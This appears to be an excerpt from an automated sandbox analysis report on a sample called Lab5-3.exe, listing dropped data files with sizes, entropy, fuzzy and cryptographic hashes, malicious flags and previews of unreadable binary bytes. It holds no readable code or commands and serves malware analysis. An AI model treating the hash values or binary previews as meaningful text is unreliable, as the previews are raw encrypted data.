                                                                                                          Entropy (8bit):7.932229432355756
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:fmQBP9gjaePnc5h+/I8MFzOE5LuliNqIHfUTid3hBaUoSGFcmeykEdEElU92i:fPVgjaePQ4/IFILliNEGx0uKeY2ElUJ
                                                                                                          MD5:1AE98C4A95D7CF4F873E6D558E35E822
                                                                                                          SHA1:ACACDECFFB7CD3070D2149F32B36B870EF823F12
                                                                                                          SHA-256:0555D587C7CD3345FC80BCB3519C60943870D557D6C9FF9A1E68BC60431F62E9
                                                                                                          SHA-512:84CDCF7D338D4E036231AA9237611E764F616E06CA757CB2E310570340EF95C7D29A60569022EB810E2BA630DF95194DEADEBB1BD522661011AD05EC493BD7E4
                                                                                                          Malicious:false
                                                                                                          Preview:.'xHt..]Wwr...$.~.@L..p..t...k....wX....b..G1...]...... U.._.`.......Z..f.n.+....(.......F..r....5P..N...(........R.~...Z.h.......w.....$..P;...S......L...b...<%l...e.j.WI.;.?.1......[......c.4'.Lh*.wm.4...L.-.../....IB..u+[...G9z.d./.......$..6.][.9t.2.Jv..*{K.DQ.>.......2.D.........|S.V..Kd..NP=.W.../d...K..ni..........Q.=.cE..T.'M..+"........fE2....qQ....sF.D.].uhR.sb.|3...Q4./$...2...b.$.[.........-..N.;...'.....(~.w.b..K.G`.;Q-..f.K ....&.....#.!..>.Y..,.Fw...6_WE..C.O...'\/.....}.5..].je$y..3..O..^.Dn5~..o...x6.Oi..gp:...[...!e..........jg*z...t.u..}...}.a.._./o~u2.^.5`..G0. ............D=.......1.)....1]Ug..Z....j.......c....,{...7).....5L._.+....5nR.fK.,......*+]..(.Z..D".3;....C;a.b9...8....&)c4.q.V..T...Mb.$....1...^.f........}^....g...q.S...`..f.]J...%r?..`e_.L..C..........5.E.\........e.>zr-....ez....+,...B<..sP...{g.r....G.X.Gv .J....O.Ki.L..H.z.Sh..a{...^.)....C.JQ(.u. ..@..{...o...[....f z.f..b.....w.9pa.U....l.8<.&.4
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):63696
                                                                                                          Entropy (8bit):7.996968631778396
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:6b4Ofaty2DEm4xXi2a63wGvTzsggxtar0CJmJADKvZ:s3SLF4xX/DHsB6r0CJcTvZ
                                                                                                          MD5:762E4CD9BDCB522C488B464EA2260FD4
                                                                                                          SHA1:7652F27FB394FB3939123058AF8B1A6EB12BCF04
                                                                                                          SHA-256:40CB32438B2310A87675A9150752C64D0AF719D977B01F9F8886128FB8C5432D
                                                                                                          SHA-512:BE66DD36932C06600EDB28ABFB9719C7777089A2016E58D80F064D8B8F34640100A9F35EF17A32BDEDE236A502D499C5D07ED0D7D6A95866F04E08083D991D7C
                                                                                                          Malicious:true
                                                                                                          Preview:G.u.].F4OKS.k.6.,RC...n...B..%.%nD....i.D.K....../R.qh...E..]}.Fa....Q....h../...k.J....+' ......H...~....FJ......oM.U;.4.".`>.w....|f..j....7 x.P......:u.....)......lv]...1.89...m.V..\m.*._....Y......%.........}J..........9V..:fd.Z.78.e.q....tZ6.2..y5.D.mt.+..........'. W...u.Q.G.;C..j|..F......x.M,.Y..y.43.....O;E.b.....(".puU.5c...@G.Eg......6{.}Q./x.(.cY...1..w..X.a$.+..t..S.`..m..V..;1..a#..-W.>..\.[!..e.jq.`.%-2.7../9..z..0..+.<....C..E!...H.s!.'.i...Vu@.7.Y.......A.1...UY.zA.}..m..S...U.2hU.|...7..h..*......g. t._v..oK.Y..MZ-:...o..t+.cg.`f......W.l..Is(....@..`w)...A.O.....-..k.!.aa......1.....Wo/.}...uM..|3...%....^G.C.Pc0.'y..=T.t.k{...g..H.<....O..bc.7e>.._....z"..g...t.}Q._/'`hi{.....E....W!.y..J.nL..r..?.'yEL.F0.Ld.wR.......6......W....k.?....K.o.M...Su..A.n...O...S..i.).........nB....@..q^.{]E.^...&1.Z.+..{..^.`..r.......}.'....{...44......<......GD..A...QP.tm{.`#9n+F....I..q.;.+E.x..]T.?.L.H%V.C..........c....&....Jf
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4544
                                                                                                          Entropy (8bit):7.960405264093021
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:D0ULtqPlj7mIJwZ6o4YRLdb5QcTBqNk2WaIOGx0uKeY2ElUJ:oHBBX5cTBs3Sd0Cb
                                                                                                          MD5:E7880211F6B032B182671CE1C90FDBEF
                                                                                                          SHA1:A07B6C47CE5288619B70CAA9620093B321AB386D
                                                                                                          SHA-256:C55D48FB1308C5F7718BDCAAF2A786EC5702DE5BAFCBFF241E9A237AF0949BB8
                                                                                                          SHA-512:836D064E2397C2E88997A05D669FEE26B393E61BD22F1E54C9C64C00994FB96E325A37C3F7CF0AF7795809C995F35F8B64ECEF6F42F9F5AD34B80A14CBEAA06F
                                                                                                          Malicious:false
                                                                                                          Preview:.F.....(..[...V......2.K....A..*.Hr.e...yX.T:..AB.Y.......Z..+......n.-..(../.l..<......N.O......l..w.+.%.h"I...4!S .Y..P..v\..P.I....0=.1.........!... c..iM..F.p.)/.`..G..2.2.jL..R......o@/c.....qZ......yRh....Z#s..:=.;G....x...p2.'...{Z.;..o{3lLl.M ../..-.up\W.J.1.Z.d.~.....Eu..+......\`.cW6.93..P.........eI8..-......9.S.Ln.g%....Z........s..*.T.7R......0..V........z.F..^0......i.yL........._.Z.Ln..e..W..p.E'.......|.,c..V...B....r.$h.%f,..........#.-i.A.krtd.....1W~.54M...uot..e.V...!g>...K....."..l.....c..m..........QYwL.l....6.f..-.....j...X._6.....5..x{.'....K..?...;M...4....4L.....[F...C..G....dy6...c....Y...{".I.:t.L_;._h.w..e.[..........B.z.(..............K.&.../..V....^..C.T3.f&.Q..._...p.u.. k,.S...1W....D."W.Z..a..@..c.., .#R...bc..}.a..b. ..a.j.._....h,.....BO:..0..p..:..w..+......7.uYFbn..:.t..-.........U........m{>V4.(..N:..2...t.o..z..g..`......Bw....u...]......5f.pM.\K./..x.....#.....?S. ..?..1....X......#...*.]Cq.U
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):431708
                                                                                                          Entropy (8bit):7.731976501424633
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:SuEitmqW38Xx6VGf4y1u7gSrdfE0cuGZdxuDoXu2UD0AJrtWOfi6c0itZovEBCaK:Si4WYGR1uJr9iFZmDotUDLtPi6XitcL
                                                                                                          MD5:1695C581980FEB39CE32913A3C998D6A
                                                                                                          SHA1:8A677B9FCAB3590B4DB793FDB1FE0EF7B0C0437C
                                                                                                          SHA-256:1CD4B70DA0B674D445256C7493E9E5FBF0F53579D388B2DB202317E828CD4479
                                                                                                          SHA-512:2EEAC1D6E4167DF97A8E13990DA0E0AB028E342835217A2B47FE5FFD769AFB936EA780C9B628BE0A927FE5CEFCF254B38CECA23013EF270CC3D30BD7933AA149
                                                                                                          Malicious:false
                                                                                                          Preview:^.H\.cC'.<?}.MF.[g.6..i.......5CR........S.U.h.W........M.q.'........O..x0...\....F...t..ns....U.....#..=....T6..l-..CE.A..a............W...$...l.....D.;..$.D.(.P..\.X3.......TC/x..l..#..7.....M%O._.P...I.N..I...._..Ym.O _-5.t...* ...P...3.dji.;..[...... .H..td..jl.....h......`.q?.q.W.......IZ.4D3@.........d.....P..h]J.w....b}....DP`..-.O.N................u....9&.x. .??...+.L..l...} B....M$..y....ry...1]..l.t.l.P...-.x..W.#.#D.y3....Q>_....;w1eZ..F..F:}....!..,.*.\A./HI...r..y.b..P..N.....k...KJ...UVu......h.9A.1.$....fM.W]..9.)n....rs..;.M&t<....[..0...@.LZ..k.KS...V(..}J`.n.i....s<9....m.0....*..!X.P.|...a)bc....E..."o.,...]P.[...d);.."....M.h.....[.p.J..~.~b.J.9...O.%....k.C.......0G.gB-#&..~...]....T.W.k..j>*.](../.rwtJu...$..D..D.I...._.t."%...^..X[..f....g.. .g...`.e2.2..."5..%...M.r.....(.~...|iD..8t.9.. ....Y.q..R....6....K..l...v.}...C..X%&.(7^.@;........@...&K.._....w.._....Z..j.uU...Q.>..uf.<$w..r.A...H...W....R
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):13040
                                                                                                          Entropy (8bit):7.983912418338325
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:ZTQEDjz+jY8s4BKL9yLxyoF0ikO1WlYkimAnbzlDexn6bZWzY3bUeTm2USoB+K1Z:ZlzpewYdXF0ikO1SAbh6xkrHZXoB+ctb
                                                                                                          MD5:B26BB156D9C416B601411FA750A82356
                                                                                                          SHA1:3F3BC6887EBF3373AC9FD12494CB31ECD663C01A
                                                                                                          SHA-256:24A99E776065D065B1024854EB6B9E173C891CD416E38E7892EA8BEE98AB4614
                                                                                                          SHA-512:A1829B1DE34570279B2A19D1217C5E194F06844CF77CAEA37E9BBD5E67DBBBC1BC79E0337E8C0C150F126CEB6D4BE72BFA4CAD75CD548C81AFFFC00B0CBC2D1D
                                                                                                          Malicious:false
                                                                                                          Preview:fy......x..x.2.......|..6.af-}......]...>..2.....LQU..S0..XI:.ON.\.D.].\b..fHhQ..h.y...)....l!.....lq...1hr..(oG]....H.!p...&F.h>`.m.z.......U.x.k.....}.....-.....*...+...8.=.............S....F4.J.v..g...2...X..~......f.........M.@L..n.Xv..{..*..TeA....V...LX.....c.p).........V.S<^.^>"........-..p....K..h..^._dp0G..s..........Wf\.ia.......I..w.,.". ..A....vC....&..C.].Nz.....1.....G....a..b....\G.Yh.I.k.Ff.PFcm.s.>^.mZR/.uj.X. w.....l8.c0<....y..k|....).3...t.E.!f.zZ..~.D^K...|m.v.n....s.#2D....Q.+.F.:].._WN.*..M@J$p....../Rb&.0nl.R...K..Y......5.jy@..=...M.3wb.|......_h.Z.$..u...N..zF.F....9...w.g2..n=....!F;......Z?..E..\$8. .p.'..A.......K2......J.. ..K...!n....=.O...........p..q.O._D..e|.?gD..2J.v.O..te...o..L.C.m.}..-z..~4.S...#Cx./...2.d3x..e.....r..E.7...T... ..dgJ.o....5.....>..Y...v<e...(..s..=.A..i...f...S3.Y.?.G.........B....U../..qq_.1....F.'.....u..0..S.a......T:Fp_..{~4|].9.*]~`..8.q=!.3..,..8j.X_;...uJ....j...n=...=."...v.....F..B
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2464
                                                                                                          Entropy (8bit):7.927326322343033
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:prEXaEF7Hx8OdK3IJJH4iinhsHfUTid3hBaUoSGFcmeykEdEElU92i:mXLVHyOdUIJJPi9Gx0uKeY2ElUJ
                                                                                                          MD5:7EC141C244F802E69A410E0A66999C74
                                                                                                          SHA1:CAF9AD91B02ADF957E05B048A2B490A4FFBB6379
                                                                                                          SHA-256:76177E381E020FB8D8AABB9353140E97B3D857024FFD9F4CBDD88A3160895D21
                                                                                                          SHA-512:D3B71B1AADA774FABFEE62C6AC0D70A5399DD12B16BE3EA373DAE605E9F920552C439B1CA33057A59456034BB9FF089B506CA8F27DB0DF43254E6B247DA03182
                                                                                                          Malicious:false
                                                                                                          Preview:... V.f}..,..Z.Y.%.ooT.."q.g......=..l..M%"...,P..2].p..~H..L.%Q.,..R._L1....'.#.;.z.N.7...(.P|.YI.)..F....5...A.OC<Y...F.DK1.:.7.g.w&...m..$...}c.w.m..4jr.|K"u..4^J4...,........F.z[..9.n... A6....K^....#N(!.%..DZ....`..j..F..O.$.W..,.xW..9.......NQ..Ax..$..'..._..G...3Jtv..V...G..u.=..nW-..n.....B.x..\.;.......8!TT2q.V.}?.}.0.8.Y....>^n.(.U...j..w.h.|.K:.B9`3sU.""N.e.3XO..y.w<...~_~..nr.y..C.*s.+d. ..[._...e.xO.k.]J7*..x.....=zA...2u..6.H(.P..)..:J.Z...E+...q`...#....@,}........e..K+.......5:....h.fv..2_.......H.+F.........4.....(.tt.3...g{..5...G.)..`..G....DZx..yE.t...qD../r..8.1....v"T...e.-.G...k.5.J........v.e......4.E..`....TL...d.1...j...6.g.Dh.K.Z^5..3I._...a.H........j...k..\..5...S..LSX....?.!.bCJ...f.K...A...Q...F.D.xH\S=...j?XI..\.z..d.dJ..E...u.EMg....`!....L.).-.....t..2."............g.sur.-.\,{...pS..;..=.]..,.z5-Zq....N..........f.k...-.3.C............B..-8G.....-D..t)...@.....Z......pn&x'....M.;.c......&>_4H.i.*
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11440
                                                                                                          Entropy (8bit):7.985577295128519
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:gr9R+pdQUTkwEgPHlPQzrERnqI0kdB+H9m5O3F/03Sme1VaYhHRjWF60Cb:gridQUHECmzgpxdBom5O3F/03Sh/HRC4
                                                                                                          MD5:23E1A783789BB033E06590C3B8E26B93
                                                                                                          SHA1:066FAD997F7F399522BEAF75AFF311E59F4436A7
                                                                                                          SHA-256:B226412201180E2622D0E3D59E46428E8EDA9E65CE7F008C2EC30896096D9D10
                                                                                                          SHA-512:05597AF7BBB3A2F519D58ABA3CFD268E01A1D99822CEDA908FAE1C261134D1B0830350D5514EE6BD2667D75526845981F37A72EDC72F46E0280B99EF0C47DFB2
                                                                                                          Malicious:false
                                                                                                          Preview:.3._.\..uu...v......?.....r.:...l8...5...i8D......]........U.iV.......F.....9..`.S.+......x8.>O.^.....7z....b......ak.^@_...Eq.l.0...t...3......!.[.)$.9.l.].d.....&._.M.t}....y.M...H.^..s..q.dYX.w8.........x..j....+u...7g..N..q..""...s)...fj...j...=....2..VW...o.....e.....!...6B...8...D)!......@.i...c.w...d*X._\."/E.>..7Q....A.e.R:...!m.e.V...<.-..!.....$&.<.C0..k...,{`.../#..p;.=..~+...}.?.5{<.6Y...a.F5.....2.pT.6...fU&....d.y)..{.....!....9N..P.sG.L6......#R....*F.*(.%.q3.I_.I.%7c..7..q..O#..Lf;j..A.@'1H[..?x.T.h...@'....."...X..y\BUL..<"B..xQ....a0X....G&=.i.:6.....KG.o...V.G.eW.g.N.Q ........S..VY.....5i.?x...C..l....*PS..<*....e....z.b.8..I.U.r..r...2.tE`...lpB..0.#t.J.b.{.j....L....32."vP.k..N...'.....i..p..A..R........#.&1#......@J...y.t3.!D.9.Z'..]2zD...X..#.M@z.o.[.y%6C..(..s...udH..Q.y.....yV.*PcZh,..3....#......oq"N..,(.ds..i..^.Pn..V..m.P..=..=.;.s.7.Y6...R.|...1.?..s:}.....hd......WxO.....r..;.&......ZH./y..<.HG.C.!Z.,..'51..A.aNt.*3
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11376
                                                                                                          Entropy (8bit):7.985157127786122
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:CngIgotXtzWSo4h6nOGooDiM8V+b1IUiMe/9r2zTox1Mq0M/F0Cb:2g9SzroLWoudcIzV9K/AtXtb
                                                                                                          MD5:C8772C7711E94D5EAFEFC1B686AC5354
                                                                                                          SHA1:986AD856CB1DDD63C1A2075CDFAD2399AC23CCA5
                                                                                                          SHA-256:3A300CA66163039BDA8BB70B5BF62085DBD094C943B29AEFCA5573989DE85280
                                                                                                          SHA-512:41DFD016DC4D2383AD441411AE94C817CE2F12FC4DC40B08A0FF21FEF51B7CB8AE3F2CF8B7AEB479B131B2AC124443829ACC7F68F378937F520FD6E4219BAC1A
                                                                                                          Malicious:false
                                                                                                          Preview:xr=.k...H1.;%.......l.c.AJi?q2.{..9....S.D....r.3.J.....k^a..||Bmb..r..A,.zXr).s.FWTS~-j.G..e.]...5.V.&..q............a.'/!..%.....*.N..3Nk^..$..."gz... .k1..Ue..P)5..^7(.a-.h/.....-.J2.!..o.~^u....T......{.......<S....6..a....{=__d....q_H.b...(.lngba.@....i...n;.t.T..4.?5sfr...]..e..`I.J..bI.U.\...gl.......R22.....:..v.vbC........('.k...D:.'....a).9..4...)...].3:...j.E..l.z..Zr.T^..}A7.L~?.N.|..^..{.\.Z^!J..L....o..h.......>.=`.=/.'jo).>.hn.PI..uEc...E.T...Jx=!rKK....]..77....yQ4r........$W\.IY....U... ...wqJ.Dt.T..P/...`.....<...iW.....xd.bWJ..Z=9..B.YR.;h..;)~....iI.....Cl..n..]s..S.%..{RD.O.y...~w.w-..d..#.^)..(.ceX.H.....{.....h..m.(...J..w.rZ.S.......8.a.*Fo......j....>2.^8H^..6.H..Jc.l.r..o.g..IK.$/*..+..$.Nz.:o.i....=...gLd..X......OMh...>.y.p......Q.....9j.SJ.i..!.M>O9.a.\3..V:......L.c6..x|Dw...C.x]..V..u:j..@.S.|.......C..0z./.J.....@....t={Wd..E0........L....i.sx..'$...r9u3FY....Iln..Z..V."r...z..6~IC.D..$5..r.z..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11088
                                                                                                          Entropy (8bit):7.980728303974606
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:cQYVEXn8obGnWDjohCSwrbkSIrpwNLwmDURoykPzcA5waGes8LVtb21Kco0Cb:cQ7n89WDjoBcbkS+pw99D1ykbcAhlAK9
                                                                                                          MD5:64C0015E49CC90F01A97F81C0147C840
                                                                                                          SHA1:12DFB6494AA444C058D64015B277EA38697E32CA
                                                                                                          SHA-256:E8D910882D716EA810BFA7CBA9C8486D272C2CCA2879C3C0952AABD57D486A99
                                                                                                          SHA-512:1B34CC0E65E4C337416B0E6986B7FE7F50BC6E3DABF4ADC2FE77F842183F76859130E719C0C2E744E1AC4F05449FAA8B826D3D91A343E66131DD79420A82A1C4
                                                                                                          Malicious:false
                                                                                                          Preview:?^...\...M.".x..3......,./...E.X].5a.\...?G.........^.h...LYB-.......&nfI.x../.`.RoC.w..J..>..`.U......e.....4......W.y..tf.~..{4.w...U.w.T2.Z..Jf.(.....{.J1.H.B.N.&..Y.k..W.{GB..+..?.&....k2.u...J.........i.?7.P1F.V...r...-........ .'.*..k..}.....%?...t....<..=."...M.f.%.q.g.......U..Q..U...../6-pS~.@...o.19.V.v.h/..}y....G....=\Mz..7.`.%..g.J..3.....5.z......D8...'.w....5...z..)..0.h.8...V<.....~...9.P.p....s.^....{...~V..2.>........5S#....K..'..5.........|.$.lR.7.DMo.....`....,v.x..l.B...n...X...B{D@O.._..|.:..uu"...|....*h...V...^5.....H{...L.....,.U..E.....+b.o......A9.......ik....u:.8.0..5...4.......D..........nS.5b...teq....m<..v....E...G..EL.qq}.bH.;j...4..O.j...{....^v8.......}{......."...8..1.$..G.F01a....!*........&x....<#.qn...3.e.".}XB.q...M~w..|c...X9.E.xL...SI....VI........o.s.0.6..Ntu.T..(*F...U..U..l.......t...2v......@...e..{.6....W...1.k.!J.|.0....7c:Q......]..E.8..!.........;.4H_....#...p...$..<8....'.W..].,*S..V.?
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11712
                                                                                                          Entropy (8bit):7.986297437835802
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:xxk2Md7byEoqqpG11JSqmTUV73GuydvF+iCroOODr8Nb0lertgVrX2XPyRJ0Cb:sdXkF8DxeKml6roOO00ertgVDoP6Jtb
                                                                                                          MD5:E7DDFE60DB39B81503AAD906B2C4DCEB
                                                                                                          SHA1:FBFF282141DC8D438F0CA04006A4563D4E553F59
                                                                                                          SHA-256:6A30AABBDC0BD4FCB58E49044DC3C2ED4078C7044D6F6B2D61487385144528D8
                                                                                                          SHA-512:020C63959D10E53CBDB4724498C516A5194C31A4CC45D3852133B4A81C31DFBD1983CF68DAF8E7387E2AAD2F404070382970B00E2DD06CE74EFEFACD862B2D74
                                                                                                          Malicious:false
                                                                                                          Preview:67.<Hw7. .H..t.;.@.....Y]...du.I.,.xi:uS.....<.. ./...`.EJ .p..&.qk.T.\.2;*.4.(k....%~Xx....x......f.=..:7./......u....o..f..s2\t_{.\f...9...D..R,...T....+.qVm...J.....q.s..zn.9..+.8...K.....`x..*e.1.]...W...*.h..... .=^..TsVQ.....3....k.5?o..4......(.".P~.3F(.....I.?...".$...6.M&..`..a...B..SS.B.<..%I.K.].y..@..J1....%1._.....)..D..\P{/.oS.Ge\..pR..uN...%.\....z...j&.l.....?Qqq.5......4.*w...m1....+..E?0.~.v(.`V..&...=...3V...n.Q;..:-./..H.j]w..zE.......h.b.8..(3.......{.}q...5...g.......k..Z....._...@....x..-.0.2<.^7..].U....'..O?.X.._..Q..U.w./d...-/...>Z...ZC.@.'.n.p?K%...F!.@.kQH,.Dc.X.u....e.....%....$8S5... D3.|...5q...:9.2^..j..]....~.JHs@-..WS.e.......t.....{..C..FkP.".D..`1_........Ns...........5......D.rQ+.]._. ..#....A.]jSA......: ...v(.e.}..........*./6..^.IO.P..a.=..k.....{.em....Ey.,.......1.#..up.2..YM.MG..G.$7.T..7...#_.t..)..>.......$....c.Xt.h......C........$.6.-r.j.|...Z#....z..K=q..@......1./SZq..1
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11968
                                                                                                          Entropy (8bit):7.985618162752236
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:s1ISXWJ8lqCyAjcrF4dx/R0fVYMeuxRIfCkIxFzJWDPvTM5VGyg0Cb:s1ISXE8kEjzTuWYxKakITULI5VAtb
                                                                                                          MD5:8B0CF89F8AF97829B094EA51A3231A45
                                                                                                          SHA1:18F79DD037608BE2859496932F1AA463E10C54CA
                                                                                                          SHA-256:697B770E0C013A3C818783987583B865A42131CDD8A802499FF0343B50A33EC2
                                                                                                          SHA-512:027549F376E04621EC2EE2FE06D424C0714159116F65849CBE789169987A429148BD58CC93D6694BB0B5EF29F8955FCE1FA5D15070D8F825E65341F363A0657B
                                                                                                          Malicious:false
                                                                                                          Preview:.....u.....H..[.T..]\...SU..i.....BAe.7.....?.Y...~bYT.D,...k9....e...P..SN..)=Zx.fRza.S.:.M...]7p)...A.n.....#...3..+cM...+...:qvF.A......y...\&.D.$gC.;..3......o.&..J..(.....Y}.....eU.CO.r...w0.T.N]tV.j.......n.6..............)..OF.#.C.NS..X7..bQ.b...-Splq_Wm).Us...H<...8.x..p8.`.>..L....{2......+.`.?2x...=..Z...6........Z..q.M3.EwA..;j....:.....'"..n..lEu..`.Y)h .........s+...T..s..SY..68.|........=.5}5@s&..<k..Z@).`........R._...<."...}.0..2~.e<.h.U..._.].....;#.ui.jDR._....0.`..t.B.D...E..U..........."}.G.B.W..G..)..8.B>...#..9 ."./5)../..y0.."..Nm.J.j...P..|J.*y$...b....n..z.ZQ...]..*]..5.......c*82.....[gp...E....9.l.....Z.%P9.........:..5z.Hg.I.H`<...<l..z...I.4....z&I..$O.,.`..}$.|Zj...../..l...(:..+....z@..y....]#.J..Gt...aeU.L...]...(....a...c6........'.#..vlWH v.S...=.q#..(.c.vl....0x4.NNV...5)b`..V.:..g.......B.%G.jJ......6.<...~..)m..7v..P.........'.....L.jn,{?.".\2m.^.I.!c..i.....j....]F....R.qK...:.........hCn
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11312
                                                                                                          Entropy (8bit):7.986305013003065
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:fBEgKaIa5QVBDBiNNNQ6qBdvTz4zOxa80jAu6tfB+271u9es70Cb:fBE1aItxinNQbBpz4zOxrjtf11uUs7tb
                                                                                                          MD5:7F8D64748526FEC009A22B294FAE36D7
                                                                                                          SHA1:0CC16F3EFF7B7CACEB0ED3A5C8428D638B1B3641
                                                                                                          SHA-256:5998E966EAA948F232C1D2A9166BB368EB5CAF5476A1A973D75FC87A94AB67B4
                                                                                                          SHA-512:41F99C5217B648CED5192FBCED6EBB8C27708525BE932D6129E0C4916B3BCCCB26EDE28ECB7D7D733D687204BB39B388984DDFC899A97B73B915DC1CE2ADA1DD
                                                                                                          Malicious:false
                                                                                                          Preview:....G....)....~aU|.G..R....&.yg.........s..B.^I..>..................v....%R...a..eU......Z`...bS.......z.)..O...[...a.M.Q.-...W..}...H..0v.?...'yBo/.I...o....l..f.q......:O.G.*..G..A./6..c....$mJ..~b.]Pd. .y+&.$..!.....j)..'x....q....^5.EV....@.=..G{.g.@.YHhhl.......#<..NhK.}]y7..EN<.+H9..gG.X.K.I..{y..d]w.|!9....3g<bT...y.0...*...s*P[.$*-.p3o.4.....>h..8....r..:4..<W..p..7.}..Q:/.2,|+3jp..V......W...p..P..g.1...PT..'..^E.5..p...D.ul.....5z[-W^.]`|..*........J.^.W........I......>*.jt*..:.....`.I....<Q."^g......(7;..-....O.....w/..JP.1)..mTz..%.`.t6.S7...e....6......J..F.Z..e.q....A.*....SH..n.......16..O..O{<..,....v....ed.#..D`F.*`sB...M..../.W.i..^?...L`.Y*.D.:o.>..N....D...Z...JWT.^....._....;.c.....).o..].P.....u....C..'......v^<'.f.1..q....U.....(2...e7]....9O.7>........?..-iE.Z......=j>.T-..N.X..w...>=A..{..qM....W...u...sg]r.Hc..7.JjgUs.I ......7k.o.....ymX..n*H(............`...*!l^'..l."..X..\.:M..\.R...rA..|p.. ..:.~#...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12032
                                                                                                          Entropy (8bit):7.985441525619985
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:yCJSm1ZyMv5I4dqU6/VeRK3CHzkkMbXBNmhwFANX8079KM+520Mx0Cb:d0gZyMBIZ/VWKyHQFXd552Fxtb
                                                                                                          MD5:DAB0D94B3A99CD135A0EBDE5386A348D
                                                                                                          SHA1:72F531FD065268B56D504CA147ED2FB8D9115E1F
                                                                                                          SHA-256:5C600B33F86A57CF1AE765D99B015647C91ABE316E88295B17EE093C12095C16
                                                                                                          SHA-512:B4C502EC902F317AD0623425F49F3823991EF38638C2536E32FF4FBC432AD1EE5B7255504A2B0E81F5875E341699BB7EA13B78BBBAE7FDAD80B1731042E34666
                                                                                                          Malicious:false
                                                                                                          Preview:U.R..G.h..i...^...I.3;6.d[...j...!...m U.*.j....o...K.'../.fq..c.e....T$.(...n.b...n.(D./yW.n.=..T.....B..:.Wt.S..?.1..`.y/..F.......!...*..@"I{T..,.l.^&.<sP.B/.k....\...h.<........l......Y....(V...P..g..N...8..B.@y[=.....|..n...G)..,M.".H\...:.q~.]..W.(K"9:.T..o..h.....G8)z.G..e...a^a;.B.I..g...8..Y..2.n..B.x.k..~.....E.#.A......%.c.....[.....I{.,n.Y......`..+......g...q.......}..D.J..7}.,..4g&-T...9 .q.,/....E..eP.dA.i..d1............#VYI.+^Z$.cn^.@...b.4E.a....[>./...dS..n..xN.....|&.....m-ec....V4]pf..]...d....~5h.U.....#.hp..<~...,..Ka^.^C...6_:../. z.....n....HE.Ov...k....x......o.j......7W.2.nH.....[.F.2..Y...y.......g.X.Jp...a.....g:..bVv*...2/.&t.w.n...P..9..2...@j.~E.$.G..$...H.p.z.....s...nBN._.b.e.HD.`O....cj1.k.'....Z.....b.#.`.1.s.h...0..k...$7.;;.......V8......Od...}zTb..k.w=..78.Qv..r.YB....t....Ns.~....4ZYS,...@..~.mi.4...I.Zx..`l.r.tF<.{.0.<..'.Q~. .......{...y.P_..d<..xK..U.s.J.V.6..g..K...r.W..YU!.<..i.]..A...4w..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10816
                                                                                                          Entropy (8bit):7.98217399508498
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:3yUw2cX38xnwNZTpVwzvPT0A80t2wN8q6h97adXeVrfG0Cb:XR882PTpVw7wktIbWZoutb
                                                                                                          MD5:5328F7E95F37CC5B4A12E3CF57CC9F7C
                                                                                                          SHA1:3C581AE4F84DBF7FFA6DCE22D54D766DB1BE2B15
                                                                                                          SHA-256:F107A68FF1D8843BCDBAF2645B73674EB6EE109F60B7C0231293E3A11DEA4313
                                                                                                          SHA-512:001107C2A675877475F422147F9563C114B23D5904BC763752A1D313C4BF8E698490BC16949E7DCB7222882674FCC5C702FF3CE251E2A484110A3D13A1B6A90D
                                                                                                          Malicious:false
